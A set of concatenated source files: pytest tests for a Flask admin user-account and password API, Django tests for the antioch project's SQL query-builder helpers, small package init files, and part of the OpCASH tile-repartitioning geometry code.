request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'Dz6RD8Rh7fj5bsPXmJDKdAPFRfcHq7NeNtjyrM9Gb',
'email': 'admin1a@test.com',
'first_name': "VTThbgrzTU8tSsD3p85LDG9Efr3twA6NvqEUVrgeq",
'last_name': "ZgtpaPWMnYYzfSvZwq9cFkMMazbVjcYbQeWQYAt4m",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_type_fail(app, mocker):
expected_status = 400
expected_json = {
"error": {
'email': ["Not a valid email address."],
'first_name': ["Not a valid string."],
'last_name': ["Not a valid string."],
'username': ["Not a valid string."],
}
}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 123,
'email': 123,
'first_name': 123,
'last_name': 123,
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_route_ok(app, mocker, client):
expected_status = 200
expected_m_length = 8
expected_m_id = 1
expected_m_username = "admin1a"
expected_m_email = "admin1a@test.com"
expected_m_first_name = "TommyA"
expected_m_last_name = "LundA"
expected_m_uri = "http://localhost/administrator/1"
expected_m_joined_at = None
# @todo: timezone
re_datetime = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}$")
data = {
'username': expected_m_username,
'email': expected_m_email,
'first_name': expected_m_first_name,
'last_name': expected_m_last_name,
}
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login db query
role2 = Role()
role2.id = 2
role2.name = 'SUPER_ADMIN'
role2.password_reset_days = 365
admin1 = Administrator()
admin1.id = 1
admin1.username = 'admin1'
admin1.email = 'admin1@test.com'
admin1.first_name = 'Tommy'
admin1.last_name = 'Lund'
admin1.password = 'admin1pass'
admin1.roles = [role2]
db_mock = mocker.patch('modules.administrators.authentication.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
# mock login user, unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.side_effect = [admin1, None, None]
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.commit.return_value = None
# mock user login
auth_mock = mocker.patch(
'modules.administrators.Authentication.is_account_locked')
auth_mock.return_value = False
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.put("/user_account?app_key=123", json=data,
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert 'user_account' in response.json
assert len(response.json['user_account']) == expected_m_length
assert response.json['user_account']['id'] == expected_m_id
assert response.json['user_account']['username'] == expected_m_username
assert response.json['user_account']['email'] == expected_m_email
assert response.json['user_account']['first_name'] == \
expected_m_first_name
assert response.json['user_account']['last_name'] == expected_m_last_name
assert response.json['user_account']['uri'] == expected_m_uri
assert bool(re_datetime.match(
response.json['user_account']['password_changed_at']))
assert response.json['user_account']['joined_at'] == expected_m_joined_at
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_route_no_app_key(app, client):
expected_status = 401
response = client.put("/user_account")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_route_bad_app_key(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.side_effect = NoResultFound()
response = client.put("/user_account?app_key=BAD_KEY")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_route_unauthorized(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login
auth_mock = mocker.patch('modules.administrators.Authentication')
auth_mock.verify_password.side_effect = Unauthorized()
response = client.put("/user_account?app_key=123")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_ok(app, mocker):
expected_status = 200
expected_m_json = {'success': 'true'}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "admin1pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
role = Role()
role.password_policy = True
role.password_reuse_history = 10
admin1 = Administrator()
admin1.password = "admin1pass"
admin1.roles = [role]
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
pw_history1 = AdministratorPasswordHistory()
pw_history1.password = "$2b$04$fpn.utPgc5S3InjyWvm1auoGq/NgpG1/Cjnu6WJNNzz6AZBeUAes2"
# mock password history
query_mock.return_value \
.filter.return_value \
.order_by.return_value \
.limit.return_value \
.__iter__.return_value = [pw_history1]
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_m_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_required_fail(app, mocker):
expected_status = 400
expected_json = {
'error': {
'password1': ['Missing data for required field.'],
'password2': ['Missing data for required field.'],
'previous_password': ['Missing data for required field.'],
}
}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {'foo': "bar"}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_previous_password_incorrect_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'previous_password': ['Incorrect password.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "bad_pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
admin1 = Administrator()
admin1.password = "admin1pass"
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_password1_complexity_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'password1': ['Please choose a more complex password.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "admin1pass",
'password1': "password",
'password2': "password",
}
admin1 = Administrator()
admin1.password = "admin1pass"
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_password2_match_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'password2': ['New passwords must match.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "admin1pass",
'password1': "admin1Pass2",
'password2': "admin1Pass3",
}
admin1 = Administrator()
admin1.password = "admin1pass"
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_password_history_reuse_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'password1': ['This password has recently been used.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "admin1Pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
role = Role()
role.password_policy = True
role.password_reuse_history = 10
admin1 = Administrator()
admin1.password = "admin1Pass"
admin1.roles = [role]
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
pw_history1 = AdministratorPasswordHistory()
pw_history1.password = "$2b$04$R6qjwKEIkvLLBvyfJMqjPeopGW3mz98maNA0VC9VMNkSoYGmrHaIK"
# mock password history
query_mock.return_value \
.filter.return_value \
.order_by.return_value \
.limit.return_value \
.__iter__.return_value = [pw_history1]
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_route_ok(app, mocker, client):
expected_status = 200
expected_m_json = {'success': 'true'}
data = {
'previous_password': "admin1pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock user login db query
role2 = Role()
role2.id = 2
role2.name = 'SUPER_ADMIN'
role2.password_reset_days = 365
role2.password_policy = True
role2.password_reuse_history = 10
admin1 = Administrator()
admin1.id = 1
admin1.password = "admin1pass"
admin1.roles = [role2]
query_mock.return_value \
.filter.return_value \
.first.return_value = admin1
db_mock = mocker.patch('modules.administrators.authentication.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
pw_history1 = AdministratorPasswordHistory()
pw_history1.password = "$2b$04$fpn.utPgc5S3InjyWvm1auoGq/NgpG1/Cjnu6WJNNzz6AZBeUAes2"
# mock password history
query_mock.return_value \
.filter.return_value \
.order_by.return_value \
.limit.return_value \
.__iter__.return_value = [pw_history1]
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
# mock user login
auth_mock = mocker.patch(
'modules.administrators.Authentication.is_account_locked')
auth_mock.return_value = False
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.put("/user_account/password?app_key=123", json=data,
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert response.json == expected_m_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_route_no_app_key(app, client):
expected_status = 401
response = client.put("/user_account/password")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_route_bad_app_key(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.side_effect = NoResultFound()
response = client.put("/user_account/password?app_key=BAD_KEY")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_route_unauthorized(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login
auth_mock = mocker.patch('modules.administrators.Authentication')
auth_mock.verify_password.side_effect = Unauthorized()
response = client.put("/user_account/password?app_key=123")
assert response.status_code == expected_status
assert 'error' in response.json
# INTEGRATION TESTS
@pytest.mark.integration
@pytest.mark.admin_api
def test_get_account_route_with_data(client):
expected_status = 200
expected_json = {
"user_account": {
"email": "admin1@test.com",
"first_name": "Tommy",
"id": 1,
"joined_at": "2018-11-01T00:00:00+0000",
"last_name": "Lund",
"password_changed_at": None,
"uri": "http://localhost/administrator/1",
"username": "admin1"
}
}
re_datetime = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\+\d{4}$")
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.get(
"/user_account?app_key=7sv3aPS45Ck8URGRKUtBdMWgKFN4ahfW",
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert response.json['user_account']['email'] == \
expected_json['user_account']['email']
assert response.json['user_account']['first_name'] == \
expected_json['user_account']['first_name']
assert response.json['user_account']['id'] == \
expected_json['user_account']['id']
assert response.json['user_account']['joined_at'] == \
expected_json['user_account']['joined_at']
assert response.json['user_account']['last_name'] == \
expected_json['user_account']['last_name']
assert response.json['user_account']['uri'] == \
expected_json['user_account']['uri']
assert response.json['user_account']['username'] == \
expected_json['user_account']['username']
assert bool(re_datetime.match(
response.json['user_account']['password_changed_at']))

@pytest.mark.integration
@pytest.mark.admin_api
def test_put_account_route_with_data(client, mocker):
    expected_status = 200
    expected_m_length = 8
    expected_m_id = 1
    expected_m_username = "admin1a"
    expected_m_email = "admin1a@test.com"
    expected_m_first_name = "TommyA"
    expected_m_last_name = "LundA"
    expected_m_uri = "http://localhost/administrator/1"
    expected_m_joined_at = "2018-11-01T00:00:00+0000"
    re_datetime = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\+\d{4}$")
    data = {
        'username': expected_m_username,
        'email': expected_m_email,
        'first_name': expected_m_first_name,
        'last_name': expected_m_last_name,
    }
    credentials = base64.b64encode(
        'admin1:admin1pass'.encode('ascii')).decode('utf-8')
    response = client.put(
        "/user_account?app_key=7sv3aPS45Ck8URGRKUtBdMWgKFN4ahfW",
        json=data,
        headers={"Authorization": f"Basic {credentials}"})
    assert response.status_code == expected_status
    assert 'user_account' in response.json
    assert len(response.json['user_account']) == expected_m_length
    assert response.json['user_account']['id'] == expected_m_id
    assert response.json['user_account']['username'] == expected_m_username
    assert response.json['user_account']['email'] == expected_m_email
    assert response.json['user_account']['first_name'] == \
        expected_m_first_name
    assert response.json['user_account']['last_name'] == expected_m_last_name
    assert response.json['user_account']['uri'] == expected_m_uri
    assert bool(re_datetime.match(
        response.json['user_account']['password_changed_at']))
    assert response.json['user_account']['joined_at'] == expected_m_joined_at


@pytest.mark.integration
@pytest.mark.admin_api
def test_put_password_route_with_data(client, mocker):
    expected_status = 200
    expected_m_json = {'success': 'true'}
    data = {
        'previous_password': "admin1pass",
        'password1': "admin1Pass2",
        'password2': "admin1Pass2",
    }
    credentials = base64.b64encode(
        'admin1:admin1pass'.encode('ascii')).decode('utf-8')
    response = client.put(
        "/user_account/password?app_key=7sv3aPS45Ck8URGRKUtBdMWgKFN4ahfW",
        json=data,
        headers={"Authorization": f"Basic {credentials}"})
    assert response.status_code == expected_status
    assert response.json == expected_m_json
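Both tests above build the HTTP Basic credentials inline. That boilerplate can be factored into a small helper; a minimal sketch (the `basic_auth_header` name is illustrative, not part of the original suite):

```python
import base64


def basic_auth_header(username: str, password: str) -> dict:
    """Return an HTTP Basic ``Authorization`` header for the given account."""
    credentials = base64.b64encode(
        f"{username}:{password}".encode("ascii")).decode("utf-8")
    return {"Authorization": f"Basic {credentials}"}
```

With such a helper, each test's `headers=` argument could become `headers=basic_auth_header('admin1', 'admin1pass')`.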

# ---------------------------------------------------------------------------
# File: blueprints/__init__.py
# Repo: Cherimolah/TeaBot (MIT license)
# ---------------------------------------------------------------------------

from . import blueprint

# ---------------------------------------------------------------------------
# File: {{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/apps/cms/models/__init__.py
# Repo: sander2324/django-cookiecutter (MIT license)
# ---------------------------------------------------------------------------

from {{cookiecutter.project_slug}}.apps.cms.models.pages import *  # noqa
from {{cookiecutter.project_slug}}.apps.cms.models.site_settings import *  # noqa
from {{cookiecutter.project_slug}}.apps.cms.models.snippets import *  # noqa

# ---------------------------------------------------------------------------
# File: antioch/test/test_sql.py
# Repo: philchristensen/antioch (MIT license)
# ---------------------------------------------------------------------------

# antioch
# Copyright (c) 1999-2019 Phil Christensen
#
# See LICENSE for details
from django.test import TestCase
from antioch.util import sql

class SQLTestCase(TestCase):
    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_interp_args_1(self):
        query = sql.interp("SELECT * FROM some_table WHERE a = %s AND b = %s", 1, 'something')
        expecting = "SELECT * FROM some_table WHERE a = %s AND b = %s" % (1, repr('something'))
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_interp_args_list(self):
        query = sql.interp("SELECT * FROM some_table WHERE a IN %s AND b = %s", [1, 2, 3], 'something')
        expecting = "SELECT * FROM some_table WHERE a IN (1,2,3) AND b = 'something'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_delete(self):
        query = sql.build_delete('table', {'col1': 'col1_data', 'col2': 'col2_data'})
        expecting = "DELETE FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_delete2(self):
        query = sql.build_delete('table', col1='col1_data', col2='col2_data')
        expecting = "DELETE FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_insert(self):
        query = sql.build_insert('table', {'col2': 'col2_data', 'col1': sql.RAW("ENCRYPT('something')")})
        expecting = "INSERT INTO table (col1, col2) VALUES (ENCRYPT('something'), 'col2_data')"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_insert2(self):
        query = sql.build_insert('table', col2='col2_data', col1=sql.RAW("ENCRYPT('something')"))
        expecting = "INSERT INTO table (col1, col2) VALUES (ENCRYPT('something'), 'col2_data')"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_multiple_insert(self):
        query = sql.build_insert('table', [
            {'col2': 'col2_data', 'col1': sql.RAW("ENCRYPT('something')")},
            {'col2': 'col2_data', 'col1': sql.RAW("ENCRYPT('something')")},
        ])
        expecting = "INSERT INTO table (col1, col2) VALUES (ENCRYPT('something'), 'col2_data'), (ENCRYPT('something'), 'col2_data')"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_insert_dot_syntax(self):
        query = sql.build_insert('db.table', {'col2': 'col2_data', 'col1': sql.RAW("ENCRYPT('something')")})
        expecting = "INSERT INTO db.table (col1, col2) VALUES (ENCRYPT('something'), 'col2_data')"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_insert_raw(self):
        query = sql.build_insert('table', {'col2': 'col2_data', 'col1': 'col1_data'})
        expecting = "INSERT INTO table (col1, col2) VALUES ('col1_data', 'col2_data')"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_dot_syntax(self):
        query = sql.build_select('db.table', {'t.col2': 'col2_data', 's.col1': 'col1_data'})
        expecting = "SELECT * FROM db.table WHERE s.col1 = 'col1_data' AND t.col2 = 'col2_data'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select(self):
        query = sql.build_select('table', {'col2': 'col2_data', 'col1': 'col1_data'})
        expecting = "SELECT * FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select2(self):
        query = sql.build_select('table', col2='col2_data', col1='col1_data')
        expecting = "SELECT * FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_order(self):
        query = sql.build_select('table', {'col1': 'col1_data', 'col2': 'col2_data', '__order_by': 'id DESC'})
        expecting = "SELECT * FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data' ORDER BY id DESC"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_distinct(self):
        query = sql.build_select('table', {'col1': 'col1_data', 'col2': 'col2_data', '__select_keyword': 'DISTINCT'})
        expecting = "SELECT DISTINCT * FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_in(self):
        query = sql.build_select('table', {'col1': ['col1_data', 'col2_data']})
        expecting = "SELECT * FROM table WHERE col1 IN ('col1_data', 'col2_data')"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_not_in(self):
        query = sql.build_select('table', {'col1': sql.NOT(['col1_data', 'col2_data'])})
        expecting = "SELECT * FROM table WHERE col1 NOT IN ('col1_data', 'col2_data')"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_in_limit(self):
        query = sql.build_select('table', {'col1': ['col1_data', 'col2_data'], '__limit': 5})
        expecting = "SELECT * FROM table WHERE col1 IN ('col1_data', 'col2_data') LIMIT 5"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_none(self):
        query = sql.build_select('table', {'col1': None})
        expecting = "SELECT * FROM table WHERE col1 IS NULL"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_raw(self):
        query = sql.build_select('table', {'col1': sql.RAW("%s = ENCRYPT('something', SUBSTRING(col1,1,2))")})
        expecting = "SELECT * FROM table WHERE col1 = ENCRYPT('something', SUBSTRING(col1,1,2))"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_not(self):
        query = sql.build_select('table', {'col1': sql.NOT("somestring")})
        expecting = "SELECT * FROM table WHERE col1 <> 'somestring'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_gt(self):
        query = sql.build_select('table', {'col1': sql.GT("somestring")})
        expecting = "SELECT * FROM table WHERE col1 > 'somestring'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))

    def test_build_select_lt(self):
        query = sql.build_select('table', {'col1': sql.LT("somestring")})
        expecting = "SELECT * FROM table WHERE col1 < 'somestring'"
        self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
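The interpolation rules exercised by `test_interp_args_1` and `test_interp_args_list` above (scalars substituted via `%s`, strings quoted, lists expanded to a parenthesized comma-separated group) can be approximated with a minimal stand-in; the real `sql.interp` lives in `antioch.util` and may differ in detail:

```python
def interp_sketch(query, *args):
    """Substitute *args into %s placeholders: quote strings with repr,
    expand lists/tuples into a parenthesized comma-separated group."""
    def fmt(arg):
        if isinstance(arg, (list, tuple)):
            return "(%s)" % ",".join(fmt(a) for a in arg)
        if isinstance(arg, str):
            return repr(arg)
        return str(arg)
    return query % tuple(fmt(a) for a in args)
```

This reproduces the expected strings in the two interp tests, e.g. `interp_sketch("a IN %s", [1, 2, 3])` yields `"a IN (1,2,3)"`.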

# ---------------------------------------------------------------------------
# File: Tile_repartitioning/supportive_code_snipptes.py
# Repo: manojMadarasingha/OpCASH (MIT license)
# ---------------------------------------------------------------------------

# This module contains the supportive functions used to develop the algorithms.

# This function returns the chords which are connected:
# hole -- boundary line
# hole --
def find_chords_combined_with_holes(holes, concave_inds, horizontal_chords, vertical_chords, neighbour_lists):
    # holes.append([[6, 8], [6, 9], [7, 9], [7, 8]])
    for hole in holes:
        for hole_v_ind, hole_v in enumerate(hole):
            matching_coord_hori = []
            matching_coord_verti = []

            # ====== left upper coordinate of the hole starts ======
            if hole_v_ind == 0:
                max_col_ind = -1
                max_row_ind = -1
                # check for any matching horizontal coordinates
                # check for boundary coordinates
                for concave_ind in concave_inds:
                    if concave_ind[0] == hole_v[0]:
                        if concave_ind[1] < hole_v[1]:
                            if concave_ind[1] > max_col_ind:
                                max_col_ind = concave_ind[1]
                                matching_coord_hori = concave_ind
                # check for any hole coordinate
                for other_holes in holes:
                    if other_holes == hole:
                        continue
                    else:
                        # check if the other hole is at the left of the referring hole
                        if other_holes[1][1] < hole_v[1]:
                            # are there any holes at the same level as the considered hole?
                            # This can be either the upper or the lower edge of that hole.
                            if other_holes[1][0] == hole_v[0]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[1][1] > max_col_ind:
                                    max_col_ind = other_holes[1][1]
                                    matching_coord_hori = other_holes[1]
                            elif other_holes[2][0] == hole_v[0]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[2][1] > max_col_ind:
                                    max_col_ind = other_holes[2][1]
                                    matching_coord_hori = other_holes[2]

                # For the moment this stays commented out, as such an occurrence
                # would rarely be observed:
                # check for any perpendicular boundary line which crosses the
                # chords between the 2 holes
                # for neighbour_pairs in neighbour_lists:
                #     if other_holes[1][0] == hole_v[0]:
                #         check_if_chord_intersects([other_holes[1], hole_v], neighbour_pairs)
                #     else:
                #         check_if_chord_intersects([other_holes[2], hole_v], neighbour_pairs)

                # check for any matching vertical coordinates on the boundary
                for concave_ind in concave_inds:
                    if concave_ind[1] == hole_v[1]:
                        if concave_ind[0] < hole_v[0]:
                            if concave_ind[0] > max_row_ind:
                                max_row_ind = concave_ind[0]
                                matching_coord_verti = concave_ind
                # check for any matching vertical coordinate with another hole above the given hole
                for other_holes in holes:
                    if other_holes == hole:
                        continue
                    else:
                        # check if the other hole is above the referring hole
                        if other_holes[3][0] < hole_v[0]:
                            # are there any holes at the same level as the considered hole?
                            if other_holes[3][1] == hole_v[1]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[3][0] > max_row_ind:
                                    max_row_ind = other_holes[3][0]
                                    matching_coord_verti = other_holes[3]
                            elif other_holes[2][1] == hole_v[1]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[2][0] > max_row_ind:
                                    max_row_ind = other_holes[2][0]
                                    matching_coord_verti = other_holes[2]
            # ====== left upper coordinate of the hole ends ======

            # ====== right upper coordinate of the hole starts ======
            if hole_v_ind == 1:
                min_col_ind = 100
                max_row_ind = -1
                # check for any matching horizontal coordinates
                # check for boundary coordinates right of the hole
                for concave_ind in concave_inds:
                    if concave_ind[0] == hole_v[0]:
                        if concave_ind[1] > hole_v[1]:
                            if concave_ind[1] < min_col_ind:
                                min_col_ind = concave_ind[1]
                                matching_coord_hori = concave_ind
                # check for any hole coordinate
                for other_holes in holes:
                    if other_holes == hole:
                        continue
                    else:
                        # check if the other hole is at the right of the referring hole
                        if other_holes[0][1] > hole_v[1]:
                            # are there any holes at the same level as the considered hole?
                            if other_holes[0][0] == hole_v[0]:
                                # compare column positions (index 1) to keep the closest point
                                if other_holes[0][1] < min_col_ind:
                                    min_col_ind = other_holes[0][1]
                                    matching_coord_hori = other_holes[0]
                            elif other_holes[3][0] == hole_v[0]:
                                if other_holes[3][1] < min_col_ind:
                                    min_col_ind = other_holes[3][1]
                                    matching_coord_hori = other_holes[3]
                # check for any matching vertical coordinates on the boundary
                for concave_ind in concave_inds:
                    if concave_ind[1] == hole_v[1]:
                        if concave_ind[0] < hole_v[0]:
                            if concave_ind[0] > max_row_ind:
                                max_row_ind = concave_ind[0]
                                matching_coord_verti = concave_ind
                # check for any matching vertical coordinate with another hole above the given hole
                for other_holes in holes:
                    if other_holes == hole:
                        continue
                    else:
                        if other_holes[3][0] < hole_v[0]:
                            # are there any holes at the same level as the considered hole?
                            if other_holes[3][1] == hole_v[1]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[3][0] > max_row_ind:
                                    max_row_ind = other_holes[3][0]
                                    matching_coord_verti = other_holes[3]
                            elif other_holes[2][1] == hole_v[1]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[2][0] > max_row_ind:
                                    max_row_ind = other_holes[2][0]
                                    matching_coord_verti = other_holes[2]
            # ====== right upper coordinate of the hole ends ======

            # ====== right lower coordinate of the hole starts ======
            if hole_v_ind == 2:
                min_col_ind = 100
                min_row_ind = 100
                # check for any matching horizontal coordinates
                # check for boundary coordinates right of the hole
                for concave_ind in concave_inds:
                    if concave_ind[0] == hole_v[0]:
                        if concave_ind[1] > hole_v[1]:
                            if concave_ind[1] < min_col_ind:
                                min_col_ind = concave_ind[1]
                                matching_coord_hori = concave_ind
                # check for any hole coordinate
                for other_holes in holes:
                    if other_holes == hole:
                        continue
                    else:
                        # check if the other hole is at the right of the referring hole
                        if other_holes[0][1] > hole_v[1]:
                            # are there any holes at the same level as the considered hole?
                            if other_holes[0][0] == hole_v[0]:
                                # compare column positions (index 1) to keep the closest point
                                if other_holes[0][1] < min_col_ind:
                                    min_col_ind = other_holes[0][1]
                                    matching_coord_hori = other_holes[0]
                            elif other_holes[3][0] == hole_v[0]:
                                if other_holes[3][1] < min_col_ind:
                                    min_col_ind = other_holes[3][1]
                                    matching_coord_hori = other_holes[3]
                # check for any matching vertical coordinates on the boundary
                for concave_ind in concave_inds:
                    if concave_ind[1] == hole_v[1]:
                        if concave_ind[0] > hole_v[0]:
                            if concave_ind[0] < min_row_ind:
                                min_row_ind = concave_ind[0]
                                matching_coord_verti = concave_ind
                # check for any matching vertical coordinate with another hole below the given hole
                for other_holes in holes:
                    if other_holes == hole:
                        continue
                    else:
                        if other_holes[1][0] > hole_v[0]:
                            # are there any holes at the same level as the considered hole?
                            if other_holes[0][1] == hole_v[1]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[0][0] < min_row_ind:
                                    min_row_ind = other_holes[0][0]
                                    matching_coord_verti = other_holes[0]
                            elif other_holes[1][1] == hole_v[1]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[1][0] < min_row_ind:
                                    min_row_ind = other_holes[1][0]
                                    matching_coord_verti = other_holes[1]
            # ====== right lower coordinate of the hole ends ======

            # ====== left lower coordinate of the hole starts ======
            if hole_v_ind == 3:
                max_col_ind = -1
                min_row_ind = 100
                # check for any matching horizontal coordinates
                # check for boundary coordinates
                for concave_ind in concave_inds:
                    if concave_ind[0] == hole_v[0]:
                        if concave_ind[1] < hole_v[1]:
                            if concave_ind[1] > max_col_ind:
                                max_col_ind = concave_ind[1]
                                matching_coord_hori = concave_ind
                # check for any hole coordinate
